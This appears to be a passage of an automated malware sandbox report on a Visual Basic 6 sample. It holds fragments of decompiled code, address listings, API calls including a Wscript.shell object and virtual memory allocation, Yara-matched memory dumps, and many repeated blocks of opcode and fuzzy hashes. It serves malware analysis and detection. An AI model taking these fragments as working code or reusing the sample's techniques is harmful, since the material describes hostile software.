          				_push(_t75);
          				L0040131C();
          				L00401322();
          				L00401334();
          				_v80 = 0x321d;
          				_push(0x419732);
          				L00401310();
          				return _t75;
          				goto L18;
          			}



































          0x00419524
          0x00419524
          0x00419524
          0x00419524
          0x00419525
          0x00419527
          0x00419536
          0x00419540
          0x00419548
          0x0041954b
          0x00419558
          0x00419561
          0x0041956c
          0x00419577
          0x0041957d
          0x0041957f
          0x00419586
          0x004195a2
          0x00419588
          0x00419588
          0x0041958d
          0x00419592
          0x00419595
          0x00419598
          0x0041959d
          0x0041959d
          0x004195a6
          0x004195ad
          0x004195b0
          0x004195bd
          0x004195c7
          0x004195cd
          0x004195d3
          0x004195d3
          0x004195d8
          0x004195dd
          0x004195e0
          0x004195e3
          0x004195e6
          0x00000000
          0x00000000
          0x004195ec
          0x004195fb
          0x00419601
          0x00419608
          0x00419624
          0x0041960a
          0x0041960a
          0x0041960f
          0x00419614
          0x00419617
          0x0041961a
          0x0041961f
          0x0041961f
          0x0041962f
          0x00419633
          0x00419635
          0x0041963d
          0x0041963e
          0x00419643
          0x00419646
          0x00419647
          0x0041964c
          0x0041964d
          0x00419650
          0x00419651
          0x00419659
          0x0041965e
          0x00419665
          0x00419667
          0x00419667
          0x00419668
          0x00419676
          0x00419677
          0x00419678
          0x00419679
          0x00419631
          0x00000000
          0x00419631
          0x00000000
          0x0041962f
          0x004196a5
          0x004196ad
          0x004196bc
          0x004196c6
          0x004196ce
          0x004196d1
          0x004196d8
          0x004196e7
          0x004196ea
          0x004196f2
          0x004196f3
          0x004196f8
          0x004196fb
          0x004196fc
          0x00419706
          0x0041970e
          0x00419713
          0x00419719
          0x0041972c
          0x00419731
          0x00000000

          APIs
          • __vbaChkstk.MSVBVM60(?,004011C6), ref: 00419540
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00402CC8,000002B4), ref: 00419598
          • _adj_fdiv_m64.MSVBVM60 ref: 004195D3
          • __vbaFpI4.MSVBVM60 ref: 004195D8
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00402CF8,000006F8), ref: 0041961A
          • #716.MSVBVM60(?,Wscript.shell,00000000), ref: 0041963E
          • __vbaObjVar.MSVBVM60(?,?,Wscript.shell,00000000), ref: 00419647
          • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000), ref: 00419651
          • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000), ref: 00419659
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __vba$CheckHresult$#716AddrefChkstkFree_adj_fdiv_m64
          • String ID: 4:4:4$Wscript.shell
          • API String ID: 2947573536-1552047234
          • Opcode ID: bc042b7ddf8af64c9a9027cd6b8b1eb764a75a9a52435bed8d2e93602713fd8c
          • Instruction ID: d94fa39a83c2d33935936f5108d2888f1a34c5f25890802ccd02aa14efad02d3
          • Opcode Fuzzy Hash: bc042b7ddf8af64c9a9027cd6b8b1eb764a75a9a52435bed8d2e93602713fd8c
          • Instruction Fuzzy Hash: CB511B71940208EFDB01EFA5C985BDEBBB4EF08754F10802AF515BA2A1C7789995CB98
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: #100
          • String ID: VB5!6%*
          • API String ID: 1341478452-4246263594
          • Opcode ID: c0d278eafa4630f7df8894d0daa8e5ad54c9ef4591ed038ee09ab6c7f89b0c90
          • Instruction ID: ddb5f96d036d07a5314e3535ad705eb00fad920c207ff555a6e46bc4e848991e
          • Opcode Fuzzy Hash: c0d278eafa4630f7df8894d0daa8e5ad54c9ef4591ed038ee09ab6c7f89b0c90
          • Instruction Fuzzy Hash: 7EE0096150E3C19EE30323B459255A57F755E5721571A04E7D4C0DB8E3C52A0809C366
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$,l(t$H"8H$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2867974647
          • Opcode ID: 1f1e1f30281949fc290ebbb5db6aeb1dad851d8c6b81ca8bae91cf392c12ec02
          • Instruction ID: 45a3a7d0b6c50f997bc5ce492a420e9e87424b64499e921e25c3fc6fff03dbb6
          • Opcode Fuzzy Hash: 1f1e1f30281949fc290ebbb5db6aeb1dad851d8c6b81ca8bae91cf392c12ec02
          • Instruction Fuzzy Hash: 5F9233716043858FDB358F38CC997DA7BB2BF56310F56822EDC898B252D3748A85CB46
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: %$+m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2973790934
          • Opcode ID: a109af086601a619204bfc5259aa3af70058cea5309fd285b2488f19936f3ace
          • Instruction ID: 3fe168b5afba7b6840e9f41223f764aa16ff1f1448fd15608efcc38e936d44c2
          • Opcode Fuzzy Hash: a109af086601a619204bfc5259aa3af70058cea5309fd285b2488f19936f3ace
          • Instruction Fuzzy Hash: F792FD716043899FCB749F29CC85BEABBB2FF55300F55812EDC899B211C7349A85CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 79d625984f19cdb3dbc04c3bc658e3d393e85c2216dc7c389afc5f10005fbed9
          • Instruction ID: b170093ea1a527e1a3a7ccd3fc79d122a66bac88689814a71991d19ad575705e
          • Opcode Fuzzy Hash: 79d625984f19cdb3dbc04c3bc658e3d393e85c2216dc7c389afc5f10005fbed9
          • Instruction Fuzzy Hash: E7521E716043899FDB749F38C9957DABBB2FF55300F52812EDC899B211C3349A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: c4d5a118df847bfb210b5ab3eab61d522d28255c045448d14c532ce3e202501b
          • Instruction ID: f20b90c0305b789ab7ccc98445de4c70acf2f19891ec5b3d52626c75b6661e28
          • Opcode Fuzzy Hash: c4d5a118df847bfb210b5ab3eab61d522d28255c045448d14c532ce3e202501b
          • Instruction Fuzzy Hash: 14520E716003899FDB749F38C8957DABBB2FF55300F52812EDC899B211D3349A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 9d688bfd9394a02ba7e8d9acc8b43fbdbacf0fa621fcc686b23af1e5b7b93091
          • Instruction ID: a062600aa30fee1d78b59f0b767417013670ceee9a2fc60401fde3e5b242ca9d
          • Opcode Fuzzy Hash: 9d688bfd9394a02ba7e8d9acc8b43fbdbacf0fa621fcc686b23af1e5b7b93091
          • Instruction Fuzzy Hash: 05420D726003899FDB748F28CD957DABBB2FF55300F56412EDC899B211D3349A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: de95159b79fd4fb19e37c4efd9fd6a8726bd33e76e5bf179757c2423e406bd47
          • Instruction ID: 9f73817128c7ec777719e4625258930c2f6350fa41302c8f80a1ffdcf3e8d612
          • Opcode Fuzzy Hash: de95159b79fd4fb19e37c4efd9fd6a8726bd33e76e5bf179757c2423e406bd47
          • Instruction Fuzzy Hash: 37322F716003899FDB748F28CD957EA7BB2FF55300F92412EDC899B211C3749A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 31fc3bb3474ced562870bcfd830f2c13af40e3f021f692081d7bccc89d484163
          • Instruction ID: 140dbf0c339a6ea017a3c0b69a01e87b21f85fe3a7caa6ab5b20ecaf665bac09
          • Opcode Fuzzy Hash: 31fc3bb3474ced562870bcfd830f2c13af40e3f021f692081d7bccc89d484163
          • Instruction Fuzzy Hash: 52323F726003899FDB748F28CD957DA7BB2FF55300F56412EDC899B221D3349A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 27d0d22bb6185343bd896e25245806bf25ebb7d22656e66427c7289bee49f574
          • Instruction ID: 9249bc925dc1c16334264f12b8cdcbaf5232550f0a575a8f2eaa6faeaefbdf5b
          • Opcode Fuzzy Hash: 27d0d22bb6185343bd896e25245806bf25ebb7d22656e66427c7289bee49f574
          • Instruction Fuzzy Hash: 96224F726003899FCB748F28CD957DA7BB2FF55300F56412EDC899B221D3749A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 188adc550d1898260a518d2b95f543fac7fdc0e61c99b60c42b511185209d2ed
          • Instruction ID: 9bd4e8b7bed80e4ac4070301249c5116ef4ac51e344bf81a6919ff1b744d03f0
          • Opcode Fuzzy Hash: 188adc550d1898260a518d2b95f543fac7fdc0e61c99b60c42b511185209d2ed
          • Instruction Fuzzy Hash: D62230726003899FDB748F28CD557EA7BB2FF55300F56412EDC898B221D3749A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$P]/L$H0$XQ$vFd$Z
          • API String ID: 0-2444681669
          • Opcode ID: 467622319c1cb0eeb158b8c6132c94330dfbf11140d427d68c25ebed089a042f
          • Instruction ID: b1838c1742bdc7fdabec2214043441cfc4c78984ccc48effa9ca2baf46330f5c
          • Opcode Fuzzy Hash: 467622319c1cb0eeb158b8c6132c94330dfbf11140d427d68c25ebed089a042f
          • Instruction Fuzzy Hash: D7122F726003899FDB748F28CD957EA7BB2FF55310F56412EDC898B211C3749A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: &#$:@-}$<t$$buJ<$p*7
          • API String ID: 2167126740-2359950644
          • Opcode ID: 39b4bb8c0cfbe97daeba4c89d0bf746d9a1c7551d7373ca2dd191a973b5d6d53
          • Instruction ID: b2ace9480f811f6ac860d49149adc58ca80998a2eb18da6e0236e5bd148139cc
          • Opcode Fuzzy Hash: 39b4bb8c0cfbe97daeba4c89d0bf746d9a1c7551d7373ca2dd191a973b5d6d53
          • Instruction Fuzzy Hash: 438258725043849FCB349F39CC457EE7BA2EF59350F56412EDC899B212D7344A86CB8A
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$n$H0$XQ$Z
          • API String ID: 0-1359885679
          • Opcode ID: 47dfc6d3c7fbe9d4974738d626748fbcd1658accb7952fc06fa729c4a722ae41
          • Instruction ID: 5846acc5c03067c313919b97ba68eb511b216bf59152e1b37db4611d8fbea42f
          • Opcode Fuzzy Hash: 47dfc6d3c7fbe9d4974738d626748fbcd1658accb7952fc06fa729c4a722ae41
          • Instruction Fuzzy Hash: FB020F726002889FDF748F28CD957EA7BB2FF55310F56402EDC899B211D3749A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$H0$XQ$Z
          • API String ID: 0-1614077978
          • Opcode ID: 1a724162128407bf3b2cb55b43b0d4230108dab8c65f67489fc4bf02e8c1b2ac
          • Instruction ID: 8a8cf5dad488b9b979beb993669e9e7bce2d7f469abae931429049ece750695e
          • Opcode Fuzzy Hash: 1a724162128407bf3b2cb55b43b0d4230108dab8c65f67489fc4bf02e8c1b2ac
          • Instruction Fuzzy Hash: E8120F726002889FDB748F28CD957EE7BB2FF55300F56412EDC899B211D3709A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$H0$XQ$Z
          • API String ID: 0-1614077978
          • Opcode ID: 9335a2dc651e22193c45e832bc16732616ffb2cb1c29bfb600df4fb6acadcd12
          • Instruction ID: d9e371267b2cbc3e76ceec4c0c096f673828b91656c16280a0ced6bd2c100254
          • Opcode Fuzzy Hash: 9335a2dc651e22193c45e832bc16732616ffb2cb1c29bfb600df4fb6acadcd12
          • Instruction Fuzzy Hash: 9602FF726002889FDB748F28CD957EE7BB2FF55340F56412EDC898B211D3749A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: <t$$E!0$p*7
          • API String ID: 2167126740-779563594
          • Opcode ID: f7fc5d568bb26ff8c8a74390113b847aff99db3adfe9d21965b7bf39eaaca67f
          • Instruction ID: 90d3e84996db31c30b596d817be232ca3ba624a68184acced514603f1fc5cd20
          • Opcode Fuzzy Hash: f7fc5d568bb26ff8c8a74390113b847aff99db3adfe9d21965b7bf39eaaca67f
          • Instruction Fuzzy Hash: FD020271A08389DFDB309F28CC84BEA77A1EF19350F55452EED899B212D7348A49CB46
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$H0$XQ
          • API String ID: 0-2522015914
          • Opcode ID: 0685a80f580e636b4a882679e86ad7bea37eb94829ed7fe0bfa682993dfa57b9
          • Instruction ID: 711c78eba06547372cc3f341abf0a2974bcb7ce0eb7bf900538b721501284798
          • Opcode Fuzzy Hash: 0685a80f580e636b4a882679e86ad7bea37eb94829ed7fe0bfa682993dfa57b9
          • Instruction Fuzzy Hash: 8CF1F0726002889FDB748F28CD967DE7BB2FF55340F56412EDC899B211D3709A86CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$H0$XQ
          • API String ID: 0-2522015914
          • Opcode ID: 5c5d617d702f3a820d80ace127725d38d5c6d03fbd47be2cd431f1739d25bdda
          • Instruction ID: 507c5994664b657c89ce5329a8c411cde15090a89f4a58370d4cd45f7032e5c4
          • Opcode Fuzzy Hash: 5c5d617d702f3a820d80ace127725d38d5c6d03fbd47be2cd431f1739d25bdda
          • Instruction Fuzzy Hash: 19E1DD716002889FDBB48F28CD967DE7BB2FF65300F56412EDC899B211D3749A85CB86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$H0$XQ
          • API String ID: 0-2522015914
          • Opcode ID: 677af3ccbede534fe6cb75dc4e5bfcdafa4200aa6a9d35368f46f98d765112c4
          • Instruction ID: 53e862e62feb2f0512764e66aab54dbc9575cdc655b9ca80bea47dc1b4bb0a76
          • Opcode Fuzzy Hash: 677af3ccbede534fe6cb75dc4e5bfcdafa4200aa6a9d35368f46f98d765112c4
          • Instruction Fuzzy Hash: EEC1FC726002889FDF748F28CD967DE7BB2FF55300F56412ADD898B221D3709A89CB85
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$H0$XQ
          • API String ID: 0-2522015914
          • Opcode ID: 7c3561e90a98de44341a84c3f665e9a51d41e8f0bdcc83858a8969df2db45ef1
          • Instruction ID: b44356216a3cd6a7622c77409b110006e513e12082f7e006d69c71c074969104
          • Opcode Fuzzy Hash: 7c3561e90a98de44341a84c3f665e9a51d41e8f0bdcc83858a8969df2db45ef1
          • Instruction Fuzzy Hash: 19B1CB716002899FDF748F28CD967DA7BB2FF55300F55412EDD4A8B222C3749A8ACB85
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: +m"$H0$XQ
          • API String ID: 0-2522015914
          • Opcode ID: f75524d69b43ceb08d23b62785fcb734cf9c3353654b8eb7c8db956adeaf7e2c
          • Instruction ID: 1ea86586b5128c08a664516f15fb1b7e78d8eb696234b438ffc6357caabb9568
          • Opcode Fuzzy Hash: f75524d69b43ceb08d23b62785fcb734cf9c3353654b8eb7c8db956adeaf7e2c
          • Instruction Fuzzy Hash: BF9100726002889FDF748F28CD927DE7BB2FF65340F56412ADD498B312D3749A498B85
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: <t$$p*7
          • API String ID: 2167126740-2143911558
          • Opcode ID: ccdfc948e90f1615f0f148b79db5d7f47b9a79507b10a8330f9dfd2c5d99638a
          • Instruction ID: d58f4ed24c97bbaad666bc73fde965acdbe95487a52057681eb8c48181d14508
          • Opcode Fuzzy Hash: ccdfc948e90f1615f0f148b79db5d7f47b9a79507b10a8330f9dfd2c5d99638a
          • Instruction Fuzzy Hash: 0BD12372A083899FCB30AF38CC557EA77B1EF58354F56412EEC899B212D7348985CB46
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: ,l(t$H"8H
          • API String ID: 0-1473902080
          • Opcode ID: 963fb52906cc3c3fae03c4efed6cc328ff94838f5fd07cf897f5ea2a4ff5ef4f
          • Instruction ID: 38e920a1fa9a6e879f6700e68497f5208150f8ede2997e73f926f70044264a61
          • Opcode Fuzzy Hash: 963fb52906cc3c3fae03c4efed6cc328ff94838f5fd07cf897f5ea2a4ff5ef4f
          • Instruction Fuzzy Hash: F1B1AE605083C58EDB36CF38C8A87DB7AA25F12324F4A829ACC994F2D7D7758549C717
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: ,l(t$H"8H
          • API String ID: 0-1473902080
          • Opcode ID: 5c8f4e2d3cdac7aee6d1942cc54ec44044cb43b38d2ef3dd2ecd72ee97a98041
          • Instruction ID: bb0b03bdfdc4601e15d3a94dca4207b15e57a76a1f3733a8f332e4f25b89ad5e
          • Opcode Fuzzy Hash: 5c8f4e2d3cdac7aee6d1942cc54ec44044cb43b38d2ef3dd2ecd72ee97a98041
          • Instruction Fuzzy Hash: 7AA1E3315083C58EDB35CF38C8A87DB7BA26F12354F5982AACC998F297D2754949C707
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: H0$XQ
          • API String ID: 0-2611478374
          • Opcode ID: 06b0ba867a7eeab4a0d267743a240d411b610372fb3e3f609da88905c193c034
          • Instruction ID: c11ab87af0496c715bedaa77ab3eac4325832e3cc381da4f5f3e3f87aa436e12
          • Opcode Fuzzy Hash: 06b0ba867a7eeab4a0d267743a240d411b610372fb3e3f609da88905c193c034
          • Instruction Fuzzy Hash: 9781FE716002889FDF748F28CC927DE7BB2FF65300F56412ADD499B322C3755A8A8B85
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: ,l(t$H"8H
          • API String ID: 0-1473902080
          • Opcode ID: 70831d9cbdb369f30437784692f4dc51ac648f2bee45972fd9550ee6be399e28
          • Instruction ID: 4f33e59c78c97ca33d8095a85a12bfaedd49fe97e1ea0dc3df1390c8feb1b086
          • Opcode Fuzzy Hash: 70831d9cbdb369f30437784692f4dc51ac648f2bee45972fd9550ee6be399e28
          • Instruction Fuzzy Hash: B87103704083858BDF35DE38C9A57EB7BA2AF16350F49826ECC8A8F28AD3754545CB17
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: E!0$q
          • API String ID: 0-92914817
          • Opcode ID: 4b0728336a152b303b4dd7feabb094e30de0b786584ecc71bc95117f36a9bc8a
          • Instruction ID: 316a5fdf5f3939a8142f00fd1fe7e65c7ff8cd2092aa44eeee3c844170c3e3a0
          • Opcode Fuzzy Hash: 4b0728336a152b303b4dd7feabb094e30de0b786584ecc71bc95117f36a9bc8a
          • Instruction Fuzzy Hash: 42710D31A4838ADFDB308F29DD84BEB77A5BF1A310F05413AED499B212E7348A048B41
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: H0$XQ
          • API String ID: 0-2611478374
          • Opcode ID: 4658f57f73adbc742f87a4ea978900c02b573d0647c56caff194899ff01cc764
          • Instruction ID: ceee318c2d8839b367bc621cb6b9b45920abe0dcaa7664c266972c2777bdbb78
          • Opcode Fuzzy Hash: 4658f57f73adbc742f87a4ea978900c02b573d0647c56caff194899ff01cc764
          • Instruction Fuzzy Hash: 4161CC716002899FDB758F28CD917CE7B76FF69340F25422AED089B322C3755A4A8B85
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: VG$s n-
          • API String ID: 0-1881932944
          • Opcode ID: be285df46b9daeda057fb597303d3a47c56ff71a48d781be7a35d6d9d95f04fa
          • Instruction ID: c7b02db55059bf059a8204b8ab10d4dc0d8bf9e5d811a3c036ffbcb0e7e40204
          • Opcode Fuzzy Hash: be285df46b9daeda057fb597303d3a47c56ff71a48d781be7a35d6d9d95f04fa
          • Instruction Fuzzy Hash: 4D51A271A05B45CFDB74CE29C9A57EB37E2AB88301F50462BCC4D8B705C234AA49CB5E
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: <t$$p*7
          • API String ID: 0-2143911558
          • Opcode ID: f7d3f382e4de569d74918aa8def42beb401f0a5964d61fb6af27038bc6f4ff5c
          • Instruction ID: fca04e6a8f468cbdf0106d3e57cf4bb75f1112679034d5151daffd10ebcfb245
          • Opcode Fuzzy Hash: f7d3f382e4de569d74918aa8def42beb401f0a5964d61fb6af27038bc6f4ff5c
          • Instruction Fuzzy Hash: C63156369142A58FC7255FB5888828F7F96FF52345F29522FDC404F342E2220889C7C7
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: ?^d\
          • API String ID: 0-2355267373
          • Opcode ID: 1da0764c309d5a6b36462632e8539e4741f571d4781009e89334a8d717e978c7
          • Instruction ID: 198f2be5f5ac79c64de1f70ce28810f1886b4b2bc26d4bdaa40f51afbb4d3b58
          • Opcode Fuzzy Hash: 1da0764c309d5a6b36462632e8539e4741f571d4781009e89334a8d717e978c7
          • Instruction Fuzzy Hash: 21916431600344CFDB358F35C889BDABBA1FF54351F55811EEC899B266C7388A85CB46
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: ?^d\
          • API String ID: 0-2355267373
          • Opcode ID: 8f1037c3f1ebc21e07488b94566d8774eac2e109398255fe30d5d738c128dddc
          • Instruction ID: aeeef12d4bb40055c4e2c8506b63e7f1175f34c218ddb009329ed168441d3157
          • Opcode Fuzzy Hash: 8f1037c3f1ebc21e07488b94566d8774eac2e109398255fe30d5d738c128dddc
          • Instruction Fuzzy Hash: 458143716403958FDF348F38C889BDA7BB1FF55341F55822ADC499B322C3358A868B86
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: E!0
          • API String ID: 0-626668754
          • Opcode ID: 045181259b2bfd07ac0de9ebd8aeb85dd22faf72ceb2edd6f2493143fb9e03cc
          • Instruction ID: 1eb2c7da0d9a0c241a658b61e0cf2e2c65757216f100ac9876a85b4ff81d9a1e
          • Opcode Fuzzy Hash: 045181259b2bfd07ac0de9ebd8aeb85dd22faf72ceb2edd6f2493143fb9e03cc
          • Instruction Fuzzy Hash: 7581EE35A4839ADFDB348E69DC94BEF77A5AF19350F05413ADD489B312E7318E088B81
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: UcuI
          • API String ID: 0-3394118002
          • Opcode ID: 408e3909bf825c10bd64570ea7fd52183a2f57b407e0a8a8c5f53ff34d74110c
          • Instruction ID: ea3733c6708aae98a57e73a856eecea23c5f75b1deb1d64e4184b0731523d8b8
          • Opcode Fuzzy Hash: 408e3909bf825c10bd64570ea7fd52183a2f57b407e0a8a8c5f53ff34d74110c
          • Instruction Fuzzy Hash: 267137756002848FDB65DE69C9947DE77A2EF99311F25812ACC4A8B312C3349E468786
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID: UcuI
          • API String ID: 0-3394118002
          • Opcode ID: 8ebde6e4ec646cb668580b7791081c0271a0be00d5592852fc730f0dd5e657c5
